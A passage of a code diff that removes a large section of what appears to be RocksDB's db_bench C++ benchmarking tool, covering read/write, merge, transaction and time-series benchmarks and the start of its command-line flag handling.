-            break;
-          }
-        }
-      }
-
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-      Status s;
-
-      if (write_merge == kWrite) {
-        s = db->Put(write_options_, key, gen.Generate(value_size_));
-      } else {
-        s = db->Merge(write_options_, key, gen.Generate(value_size_));
-      }
-      written++;
-
-      if (!s.ok()) {
-        fprintf(stderr, "put or merge error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value_size_;
-      thread->stats.FinishedOps(&db_, db_.db, 1, kWrite);
-
-      if (FLAGS_benchmark_write_rate_limit > 0) {
-        write_rate_limiter->Request(
-            entries_per_batch_ * (value_size_ + key_size_), Env::IO_HIGH,
-            nullptr /* stats */, RateLimiter::OpType::kWrite);
-      }
-    }
-    thread->stats.AddBytes(bytes);
-  }
-
-  // Given a key K and value V, this puts (K+"0", V), (K+"1", V), (K+"2", V)
-  // in DB atomically i.e in a single batch. Also refer GetMany.
-  Status PutMany(DB* db, const WriteOptions& writeoptions, const Slice& key,
-                 const Slice& value) {
-    std::string suffixes[3] = {"2", "1", "0"};
-    std::string keys[3];
-
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 3; i++) {
-      keys[i] = key.ToString() + suffixes[i];
-      batch.Put(keys[i], value);
-    }
-
-    s = db->Write(writeoptions, &batch);
-    return s;
-  }
-
-
-  // Given a key K, this deletes (K+"0", V), (K+"1", V), (K+"2", V)
-  // in DB atomically i.e in a single batch. Also refer GetMany.
-  Status DeleteMany(DB* db, const WriteOptions& writeoptions,
-                    const Slice& key) {
-    std::string suffixes[3] = {"1", "2", "0"};
-    std::string keys[3];
-
-    WriteBatch batch;
-    Status s;
-    for (int i = 0; i < 3; i++) {
-      keys[i] = key.ToString() + suffixes[i];
-      batch.Delete(keys[i]);
-    }
-
-    s = db->Write(writeoptions, &batch);
-    return s;
-  }
-
-  // Given a key K and value V, this gets values for K+"0", K+"1" and K+"2"
-  // in the same snapshot, and verifies that all the values are identical.
-  // ASSUMES that PutMany was used to put (K, V) into the DB.
-  Status GetMany(DB* db, const ReadOptions& readoptions, const Slice& key,
-                 std::string* value) {
-    std::string suffixes[3] = {"0", "1", "2"};
-    std::string keys[3];
-    Slice key_slices[3];
-    std::string values[3];
-    ReadOptions readoptionscopy = readoptions;
-    readoptionscopy.snapshot = db->GetSnapshot();
-    Status s;
-    for (int i = 0; i < 3; i++) {
-      keys[i] = key.ToString() + suffixes[i];
-      key_slices[i] = keys[i];
-      s = db->Get(readoptionscopy, key_slices[i], value);
-      if (!s.ok() && !s.IsNotFound()) {
-        fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-        values[i] = "";
-        // we continue after error rather than exiting so that we can
-        // find more errors if any
-      } else if (s.IsNotFound()) {
-        values[i] = "";
-      } else {
-        values[i] = *value;
-      }
-    }
-    db->ReleaseSnapshot(readoptionscopy.snapshot);
-
-    if ((values[0] != values[1]) || (values[1] != values[2])) {
-      fprintf(stderr, "inconsistent values for key %s: %s, %s, %s\n",
-              key.ToString().c_str(), values[0].c_str(), values[1].c_str(),
-              values[2].c_str());
-      // we continue after error rather than exiting so that we can
-      // find more errors if any
-    }
-
-    return s;
-  }
-
-  // Differs from readrandomwriterandom in the following ways:
-  // (a) Uses GetMany/PutMany to read/write key values. Refer to those funcs.
-  // (b) Does deletes as well (per FLAGS_deletepercent)
-  // (c) In order to achieve high % of 'found' during lookups, and to do
-  //     multiple writes (including puts and deletes) it uses upto
-  //     FLAGS_numdistinct distinct keys instead of FLAGS_num distinct keys.
-  // (d) Does not have a MultiGet option.
-  void RandomWithVerify(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int get_weight = 0;
-    int put_weight = 0;
-    int delete_weight = 0;
-    int64_t gets_done = 0;
-    int64_t puts_done = 0;
-    int64_t deletes_done = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    // the number of iterations is the larger of read_ or write_
-    for (int64_t i = 0; i < readwrites_; i++) {
-      DB* db = SelectDB(thread);
-      if (get_weight == 0 && put_weight == 0 && delete_weight == 0) {
-        // one batch completed, reinitialize for next batch
-        get_weight = FLAGS_readwritepercent;
-        delete_weight = FLAGS_deletepercent;
-        put_weight = 100 - get_weight - delete_weight;
-      }
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_numdistinct,
-          FLAGS_numdistinct, &key);
-      if (get_weight > 0) {
-        // do all the gets first
-        Status s = GetMany(db, options, key, &value);
-        if (!s.ok() && !s.IsNotFound()) {
-          fprintf(stderr, "getmany error: %s\n", s.ToString().c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        } else if (!s.IsNotFound()) {
-          found++;
-        }
-        get_weight--;
-        gets_done++;
-        thread->stats.FinishedOps(&db_, db_.db, 1, kRead);
-      } else if (put_weight > 0) {
-        // then do all the corresponding number of puts
-        // for all the gets we have done earlier
-        Status s = PutMany(db, write_options_, key, gen.Generate(value_size_));
-        if (!s.ok()) {
-          fprintf(stderr, "putmany error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        put_weight--;
-        puts_done++;
-        thread->stats.FinishedOps(&db_, db_.db, 1, kWrite);
-      } else if (delete_weight > 0) {
-        Status s = DeleteMany(db, write_options_, key);
-        if (!s.ok()) {
-          fprintf(stderr, "deletemany error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        delete_weight--;
-        deletes_done++;
-        thread->stats.FinishedOps(&db_, db_.db, 1, kDelete);
-      }
-    }
-    char msg[128];
-    snprintf(msg, sizeof(msg),
-             "( get:%" PRIu64 " put:%" PRIu64 " del:%" PRIu64 " total:%" \
-             PRIu64 " found:%" PRIu64 ")",
-             gets_done, puts_done, deletes_done, readwrites_, found);
-    thread->stats.AddMessage(msg);
-  }
-
-  // This is different from ReadWhileWriting because it does not use
-  // an extra thread.
-  void ReadRandomWriteRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int get_weight = 0;
-    int put_weight = 0;
-    int64_t reads_done = 0;
-    int64_t writes_done = 0;
-    Duration duration(FLAGS_duration, readwrites_);
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    // the number of iterations is the larger of read_ or write_
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-      if (get_weight == 0 && put_weight == 0) {
-        // one batch completed, reinitialize for next batch
-        get_weight = FLAGS_readwritepercent;
-        put_weight = 100 - get_weight;
-      }
-      if (get_weight > 0) {
-        // do all the gets first
-        Status s = db->Get(options, key, &value);
-        if (!s.ok() && !s.IsNotFound()) {
-          fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        } else if (!s.IsNotFound()) {
-          found++;
-        }
-        get_weight--;
-        reads_done++;
-        thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      } else  if (put_weight > 0) {
-        // then do all the corresponding number of puts
-        // for all the gets we have done earlier
-        Status s = db->Put(write_options_, key, gen.Generate(value_size_));
-        if (!s.ok()) {
-          fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        put_weight--;
-        writes_done++;
-        thread->stats.FinishedOps(nullptr, db, 1, kWrite);
-      }
-    }
-    char msg[100];
-    snprintf(msg, sizeof(msg), "( reads:%" PRIu64 " writes:%" PRIu64 \
-             " total:%" PRIu64 " found:%" PRIu64 ")",
-             reads_done, writes_done, readwrites_, found);
-    thread->stats.AddMessage(msg);
-  }
-
-  //
-  // Read-modify-write for random keys
-  void UpdateRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int64_t bytes = 0;
-    Duration duration(FLAGS_duration, readwrites_);
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // the number of iterations is the larger of read_ or write_
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-
-      auto status = db->Get(options, key, &value);
-      if (status.ok()) {
-        ++found;
-        bytes += key.size() + value.size();
-      } else if (!status.IsNotFound()) {
-        fprintf(stderr, "Get returned an error: %s\n",
-                status.ToString().c_str());
-        abort();
-      }
-
-      if (thread->shared->write_rate_limiter) {
-        thread->shared->write_rate_limiter->Request(
-            key.size() + value_size_, Env::IO_HIGH, nullptr /*stats*/,
-            RateLimiter::OpType::kWrite);
-      }
-
-      Status s = db->Put(write_options_, key, gen.Generate(value_size_));
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value_size_;
-      thread->stats.FinishedOps(nullptr, db, 1, kUpdate);
-    }
-    char msg[100];
-    snprintf(msg, sizeof(msg),
-             "( updates:%" PRIu64 " found:%" PRIu64 ")", readwrites_, found);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-  }
-
-  // Read-modify-write for random keys.
-  // Each operation causes the key grow by value_size (simulating an append).
-  // Generally used for benchmarking against merges of similar type
-  void AppendRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t found = 0;
-    int64_t bytes = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // The number of iterations is the larger of read_ or write_
-    Duration duration(FLAGS_duration, readwrites_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-
-      auto status = db->Get(options, key, &value);
-      if (status.ok()) {
-        ++found;
-        bytes += key.size() + value.size();
-      } else if (!status.IsNotFound()) {
-        fprintf(stderr, "Get returned an error: %s\n",
-                status.ToString().c_str());
-        abort();
-      } else {
-        // If not existing, then just assume an empty string of data
-        value.clear();
-      }
-
-      // Update the value (by appending data)
-      Slice operand = gen.Generate(value_size_);
-      if (value.size() > 0) {
-        // Use a delimiter to match the semantics for StringAppendOperator
-        value.append(1,',');
-      }
-      value.append(operand.data(), operand.size());
-
-      // Write back to the database
-      Status s = db->Put(write_options_, key, value);
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value.size();
-      thread->stats.FinishedOps(nullptr, db, 1, kUpdate);
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "( updates:%" PRIu64 " found:%" PRIu64 ")",
-            readwrites_, found);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-  }
-
-  // Read-modify-write for random keys (using MergeOperator)
-  // The merge operator to use should be defined by FLAGS_merge_operator
-  // Adjust FLAGS_value_size so that the keys are reasonable for this operator
-  // Assumes that the merge operator is non-null (i.e.: is well-defined)
-  //
-  // For example, use FLAGS_merge_operator="uint64add" and FLAGS_value_size=8
-  // to simulate random additions over 64-bit integers using merge.
-  //
-  // The number of merges on the same key can be controlled by adjusting
-  // FLAGS_merge_keys.
-  void MergeRandom(ThreadState* thread) {
-    RandomGenerator gen;
-    int64_t bytes = 0;
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // The number of iterations is the larger of read_ or write_
-    Duration duration(FLAGS_duration, readwrites_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % merge_keys_, merge_keys_, &key);
-
-      Status s = db->Merge(write_options_, key, gen.Generate(value_size_));
-
-      if (!s.ok()) {
-        fprintf(stderr, "merge error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes += key.size() + value_size_;
-      thread->stats.FinishedOps(nullptr, db, 1, kMerge);
-    }
-
-    // Print some statistics
-    char msg[100];
-    snprintf(msg, sizeof(msg), "( updates:%" PRIu64 ")", readwrites_);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-  }
-
-  // Read and merge random keys. The amount of reads and merges are controlled
-  // by adjusting FLAGS_num and FLAGS_mergereadpercent. The number of distinct
-  // keys (and thus also the number of reads and merges on the same key) can be
-  // adjusted with FLAGS_merge_keys.
-  //
-  // As with MergeRandom, the merge operator to use should be defined by
-  // FLAGS_merge_operator.
-  void ReadRandomMergeRandom(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    RandomGenerator gen;
-    std::string value;
-    int64_t num_hits = 0;
-    int64_t num_gets = 0;
-    int64_t num_merges = 0;
-    size_t max_length = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    // the number of iterations is the larger of read_ or write_
-    Duration duration(FLAGS_duration, readwrites_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      GenerateKeyFromInt(thread->rand.Next() % merge_keys_, merge_keys_, &key);
-
-      bool do_merge = int(thread->rand.Next() % 100) < FLAGS_mergereadpercent;
-
-      if (do_merge) {
-        Status s = db->Merge(write_options_, key, gen.Generate(value_size_));
-        if (!s.ok()) {
-          fprintf(stderr, "merge error: %s\n", s.ToString().c_str());
-          exit(1);
-        }
-        num_merges++;
-        thread->stats.FinishedOps(nullptr, db, 1, kMerge);
-      } else {
-        Status s = db->Get(options, key, &value);
-        if (value.length() > max_length)
-          max_length = value.length();
-
-        if (!s.ok() && !s.IsNotFound()) {
-          fprintf(stderr, "get error: %s\n", s.ToString().c_str());
-          // we continue after error rather than exiting so that we can
-          // find more errors if any
-        } else if (!s.IsNotFound()) {
-          num_hits++;
-        }
-        num_gets++;
-        thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      }
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg),
-             "(reads:%" PRIu64 " merges:%" PRIu64 " total:%" PRIu64
-             " hits:%" PRIu64 " maxlength:%" ROCKSDB_PRIszt ")",
-             num_gets, num_merges, readwrites_, num_hits, max_length);
-    thread->stats.AddMessage(msg);
-  }
-
-  void WriteSeqSeekSeq(ThreadState* thread) {
-    writes_ = FLAGS_num;
-    DoWrite(thread, SEQUENTIAL);
-    // exclude writes from the ops/sec calculation
-    thread->stats.Start(thread->tid);
-
-    DB* db = SelectDB(thread);
-    std::unique_ptr<Iterator> iter(
-      db->NewIterator(ReadOptions(FLAGS_verify_checksum, true)));
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    for (int64_t i = 0; i < FLAGS_num; ++i) {
-      GenerateKeyFromInt(i, FLAGS_num, &key);
-      iter->Seek(key);
-      assert(iter->Valid() && iter->key() == key);
-      thread->stats.FinishedOps(nullptr, db, 1, kSeek);
-
-      for (int j = 0; j < FLAGS_seek_nexts && i + 1 < FLAGS_num; ++j) {
-        if (!FLAGS_reverse_iterator) {
-          iter->Next();
-        } else {
-          iter->Prev();
-        }
-        GenerateKeyFromInt(++i, FLAGS_num, &key);
-        assert(iter->Valid() && iter->key() == key);
-        thread->stats.FinishedOps(nullptr, db, 1, kSeek);
-      }
-
-      iter->Seek(key);
-      assert(iter->Valid() && iter->key() == key);
-      thread->stats.FinishedOps(nullptr, db, 1, kSeek);
-    }
-  }
-
-#ifndef ROCKSDB_LITE
-  // This benchmark stress tests Transactions.  For a given --duration (or
-  // total number of --writes, a Transaction will perform a read-modify-write
-  // to increment the value of a key in each of N(--transaction-sets) sets of
-  // keys (where each set has --num keys).  If --threads is set, this will be
-  // done in parallel.
-  //
-  // To test transactions, use --transaction_db=true.  Not setting this
-  // parameter
-  // will run the same benchmark without transactions.
-  //
-  // RandomTransactionVerify() will then validate the correctness of the results
-  // by checking if the sum of all keys in each set is the same.
-  void RandomTransaction(ThreadState* thread) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    Duration duration(FLAGS_duration, readwrites_);
-    ReadOptions read_options(FLAGS_verify_checksum, true);
-    uint16_t num_prefix_ranges = static_cast<uint16_t>(FLAGS_transaction_sets);
-    uint64_t transactions_done = 0;
-
-    if (num_prefix_ranges == 0 || num_prefix_ranges > 9999) {
-      fprintf(stderr, "invalid value for transaction_sets\n");
-      abort();
-    }
-
-    TransactionOptions txn_options;
-    txn_options.lock_timeout = FLAGS_transaction_lock_timeout;
-    txn_options.set_snapshot = FLAGS_transaction_set_snapshot;
-
-    RandomTransactionInserter inserter(&thread->rand, write_options_,
-                                       read_options, FLAGS_num,
-                                       num_prefix_ranges);
-
-    if (FLAGS_num_multi_db > 1) {
-      fprintf(stderr,
-              "Cannot run RandomTransaction benchmark with "
-              "FLAGS_multi_db > 1.");
-      abort();
-    }
-
-    while (!duration.Done(1)) {
-      bool success;
-
-      // RandomTransactionInserter will attempt to insert a key for each
-      // # of FLAGS_transaction_sets
-      if (FLAGS_optimistic_transaction_db) {
-        success = inserter.OptimisticTransactionDBInsert(db_.opt_txn_db);
-      } else if (FLAGS_transaction_db) {
-        TransactionDB* txn_db = reinterpret_cast<TransactionDB*>(db_.db);
-        success = inserter.TransactionDBInsert(txn_db, txn_options);
-      } else {
-        success = inserter.DBInsert(db_.db);
-      }
-
-      if (!success) {
-        fprintf(stderr, "Unexpected error: %s\n",
-                inserter.GetLastStatus().ToString().c_str());
-        abort();
-      }
-
-      thread->stats.FinishedOps(nullptr, db_.db, 1, kOthers);
-      transactions_done++;
-    }
-
-    char msg[100];
-    if (FLAGS_optimistic_transaction_db || FLAGS_transaction_db) {
-      snprintf(msg, sizeof(msg),
-               "( transactions:%" PRIu64 " aborts:%" PRIu64 ")",
-               transactions_done, inserter.GetFailureCount());
-    } else {
-      snprintf(msg, sizeof(msg), "( batches:%" PRIu64 " )", transactions_done);
-    }
-    thread->stats.AddMessage(msg);
-
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  // Verifies consistency of data after RandomTransaction() has been run.
-  // Since each iteration of RandomTransaction() incremented a key in each set
-  // by the same value, the sum of the keys in each set should be the same.
-  void RandomTransactionVerify() {
-    if (!FLAGS_transaction_db && !FLAGS_optimistic_transaction_db) {
-      // transactions not used, nothing to verify.
-      return;
-    }
-
-    Status s =
-        RandomTransactionInserter::Verify(db_.db,
-                            static_cast<uint16_t>(FLAGS_transaction_sets));
-
-    if (s.ok()) {
-      fprintf(stdout, "RandomTransactionVerify Success.\n");
-    } else {
-      fprintf(stdout, "RandomTransactionVerify FAILED!!\n");
-    }
-  }
-#endif  // ROCKSDB_LITE
-
-  // Writes and deletes random keys without overwriting keys.
-  //
-  // This benchmark is intended to partially replicate the behavior of MyRocks
-  // secondary indices: All data is stored in keys and updates happen by
-  // deleting the old version of the key and inserting the new version.
-  void RandomReplaceKeys(ThreadState* thread) {
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    std::vector<uint32_t> counters(FLAGS_numdistinct, 0);
-    size_t max_counter = 50;
-    RandomGenerator gen;
-
-    Status s;
-    DB* db = SelectDB(thread);
-    for (int64_t i = 0; i < FLAGS_numdistinct; i++) {
-      GenerateKeyFromInt(i * max_counter, FLAGS_num, &key);
-      s = db->Put(write_options_, key, gen.Generate(value_size_));
-      if (!s.ok()) {
-        fprintf(stderr, "Operation failed: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-    }
-
-    db->GetSnapshot();
-
-    std::default_random_engine generator;
-    std::normal_distribution<double> distribution(FLAGS_numdistinct / 2.0,
-                                                  FLAGS_stddev);
-    Duration duration(FLAGS_duration, FLAGS_num);
-    while (!duration.Done(1)) {
-      int64_t rnd_id = static_cast<int64_t>(distribution(generator));
-      int64_t key_id = std::max(std::min(FLAGS_numdistinct - 1, rnd_id),
-                                static_cast<int64_t>(0));
-      GenerateKeyFromInt(key_id * max_counter + counters[key_id], FLAGS_num,
-                         &key);
-      s = FLAGS_use_single_deletes ? db->SingleDelete(write_options_, key)
-                                   : db->Delete(write_options_, key);
-      if (s.ok()) {
-        counters[key_id] = (counters[key_id] + 1) % max_counter;
-        GenerateKeyFromInt(key_id * max_counter + counters[key_id], FLAGS_num,
-                           &key);
-        s = db->Put(write_options_, key, Slice());
-      }
-
-      if (!s.ok()) {
-        fprintf(stderr, "Operation failed: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-
-      thread->stats.FinishedOps(nullptr, db, 1, kOthers);
-    }
-
-    char msg[200];
-    snprintf(msg, sizeof(msg),
-             "use single deletes: %d, "
-             "standard deviation: %lf\n",
-             FLAGS_use_single_deletes, FLAGS_stddev);
-    thread->stats.AddMessage(msg);
-  }
-
-  void TimeSeriesReadOrDelete(ThreadState* thread, bool do_deletion) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t bytes = 0;
-
-    Iterator* iter = nullptr;
-    // Only work on single database
-    assert(db_.db != nullptr);
-    iter = db_.db->NewIterator(options);
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    char value_buffer[256];
-    while (true) {
-      {
-        MutexLock l(&thread->shared->mu);
-        if (thread->shared->num_done >= 1) {
-          // Write thread have finished
-          break;
-        }
-      }
-      if (!FLAGS_use_tailing_iterator) {
-        delete iter;
-        iter = db_.db->NewIterator(options);
-      }
-      // Pick a Iterator to use
-
-      int64_t key_id = thread->rand.Next() % FLAGS_key_id_range;
-      GenerateKeyFromInt(key_id, FLAGS_num, &key);
-      // Reset last 8 bytes to 0
-      char* start = const_cast<char*>(key.data());
-      start += key.size() - 8;
-      memset(start, 0, 8);
-      ++read;
-
-      bool key_found = false;
-      // Seek the prefix
-      for (iter->Seek(key); iter->Valid() && iter->key().starts_with(key);
-           iter->Next()) {
-        key_found = true;
-        // Copy out iterator's value to make sure we read them.
-        if (do_deletion) {
-          bytes += iter->key().size();
-          if (KeyExpired(timestamp_emulator_.get(), iter->key())) {
-            thread->stats.FinishedOps(&db_, db_.db, 1, kDelete);
-            db_.db->Delete(write_options_, iter->key());
-          } else {
-            break;
-          }
-        } else {
-          bytes += iter->key().size() + iter->value().size();
-          thread->stats.FinishedOps(&db_, db_.db, 1, kRead);
-          Slice value = iter->value();
-          memcpy(value_buffer, value.data(),
-                 std::min(value.size(), sizeof(value_buffer)));
-
-          assert(iter->status().ok());
-        }
-      }
-      found += key_found;
-
-      if (thread->shared->read_rate_limiter.get() != nullptr) {
-        thread->shared->read_rate_limiter->Request(
-            1, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-    }
-    delete iter;
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)", found,
-             read);
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  void TimeSeriesWrite(ThreadState* thread) {
-    // Special thread that keeps writing until other threads are done.
-    RandomGenerator gen;
-    int64_t bytes = 0;
-
-    // Don't merge stats from this thread with the readers.
-    thread->stats.SetExcludeFromMerge();
-
-    std::unique_ptr<RateLimiter> write_rate_limiter;
-    if (FLAGS_benchmark_write_rate_limit > 0) {
-      write_rate_limiter.reset(
-          NewGenericRateLimiter(FLAGS_benchmark_write_rate_limit));
-    }
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    Duration duration(FLAGS_duration, writes_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-
-      uint64_t key_id = thread->rand.Next() % FLAGS_key_id_range;
-      // Write key id
-      GenerateKeyFromInt(key_id, FLAGS_num, &key);
-      // Write timestamp
-
-      char* start = const_cast<char*>(key.data());
-      char* pos = start + 8;
-      int bytes_to_fill =
-          std::min(key_size_ - static_cast<int>(pos - start), 8);
-      uint64_t timestamp_value = timestamp_emulator_->Get();
-      if (port::kLittleEndian) {
-        for (int i = 0; i < bytes_to_fill; ++i) {
-          pos[i] = (timestamp_value >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-        }
-      } else {
-        memcpy(pos, static_cast<void*>(&timestamp_value), bytes_to_fill);
-      }
-
-      timestamp_emulator_->Inc();
-
-      Status s;
-
-      s = db->Put(write_options_, key, gen.Generate(value_size_));
-
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-      bytes = key.size() + value_size_;
-      thread->stats.FinishedOps(&db_, db_.db, 1, kWrite);
-      thread->stats.AddBytes(bytes);
-
-      if (FLAGS_benchmark_write_rate_limit > 0) {
-        write_rate_limiter->Request(
-            entries_per_batch_ * (value_size_ + key_size_), Env::IO_HIGH,
-            nullptr /* stats */, RateLimiter::OpType::kWrite);
-      }
-    }
-  }
-
-  void TimeSeries(ThreadState* thread) {
-    if (thread->tid > 0) {
-      bool do_deletion = FLAGS_expire_style == "delete" &&
-                         thread->tid <= FLAGS_num_deletion_threads;
-      TimeSeriesReadOrDelete(thread, do_deletion);
-    } else {
-      TimeSeriesWrite(thread);
-      thread->stats.Stop();
-      thread->stats.Report("timeseries write");
-    }
-  }
-
-  void Compact(ThreadState* thread) {
-    DB* db = SelectDB(thread);
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  }
-
-  void CompactAll() {
-    if (db_.db != nullptr) {
-      db_.db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-    for (const auto& db_with_cfh : multi_dbs_) {
-      db_with_cfh.db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-  }
-
-  void ResetStats() {
-    if (db_.db != nullptr) {
-      db_.db->ResetStats();
-    }
-    for (const auto& db_with_cfh : multi_dbs_) {
-      db_with_cfh.db->ResetStats();
-    }
-  }
-
-  void PrintStats(const char* key) {
-    if (db_.db != nullptr) {
-      PrintStats(db_.db, key, false);
-    }
-    for (const auto& db_with_cfh : multi_dbs_) {
-      PrintStats(db_with_cfh.db, key, true);
-    }
-  }
-
-  void PrintStats(DB* db, const char* key, bool print_header = false) {
-    if (print_header) {
-      fprintf(stdout, "\n==== DB: %s ===\n", db->GetName().c_str());
-    }
-    std::string stats;
-    if (!db->GetProperty(key, &stats)) {
-      stats = "(failed)";
-    }
-    fprintf(stdout, "\n%s\n", stats.c_str());
-  }
-};
-
-int db_bench_tool(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  static bool initialized = false;
-  if (!initialized) {
-    SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                    " [OPTIONS]...");
-    initialized = true;
-  }
-  ParseCommandLineFlags(&argc, &argv, true);
-  FLAGS_compaction_style_e = (rocksdb::CompactionStyle) FLAGS_compaction_style;
-#ifndef ROCKSDB_LITE
-  if (FLAGS_statistics && !FLAGS_statistics_string.empty()) {
-    fprintf(stderr,
-            "Cannot provide both --statistics and --statistics_string.\n");
-    exit(1);
-  }
-  if (!FLAGS_statistics_string.empty()) {
-    std::unique_ptr<Statistics> custom_stats_guard;
-    dbstats.reset(NewCustomObject<Statistics>(FLAGS_statistics_string,
-                                              &custom_stats_guard));
-    custom_stats_guard.release();
-    if (dbstats == nullptr) {
-      fprintf(stderr, "No Statistics registered matching string: %s\n",
-              FLAGS_statistics_string.c_str());
-      exit(1);
-    }
-  }
-#endif  // ROCKSDB_LITE
-  if (FLAGS_statistics) {
-    dbstats = rocksdb::CreateDBStatistics();
-  }
-  FLAGS_compaction_pri_e = (rocksdb::CompactionPri)FLAGS_compaction_pri;
-
-  std::vector<std::string> fanout = rocksdb::StringSplit(
-      FLAGS_max_bytes_for_level_multiplier_additional, ',');
-  for (size_t j = 0; j < fanout.size(); j++) {
-    FLAGS_max_bytes_for_level_multiplier_additional_v.push_back(
-#ifndef CYGWIN
-        std::stoi(fanout[j]));
-#else
-        stoi(fanout[j]));
-#endif
-  }
-
-  FLAGS_compression_type_e =
-    StringToCompressionType(FLAGS_compression_type.c_str());
-
-#ifndef ROCKSDB_LITE
-  std::unique_ptr<Env> custom_env_guard;
-  if (!FLAGS_hdfs.empty() && !FLAGS_env_uri.empty()) {
-    fprintf(stderr, "Cannot provide both --hdfs and --env_uri.\n");
-    exit(1);
-  } else if (!FLAGS_env_uri.empty()) {
-    FLAGS_env = NewCustomObject<Env>(FLAGS_env_uri, &custom_env_guard);
-    if (FLAGS_env == nullptr) {
-      fprintf(stderr, "No Env registered for URI: %s\n", FLAGS_env_uri.c_str());
-      exit(1);
-    }
-  }
-#endif  // ROCKSDB_LITE
-  if (!FLAGS_hdfs.empty()) {
-    FLAGS_env  = new rocksdb::HdfsEnv(FLAGS_hdfs);
-  }
-
-  if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "NONE"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::NONE;
-  else if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "NORMAL"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::NORMAL;
-  else if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "SEQUENTIAL"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::SEQUENTIAL;
-  else if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "WILLNEED"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::WILLNEED;
-  else {
-    fprintf(stdout, "Unknown compaction fadvice:%s\n",
-            FLAGS_compaction_fadvice.c_str());
-  }
-
-  FLAGS_rep_factory = StringToRepFactory(FLAGS_memtablerep.c_str());
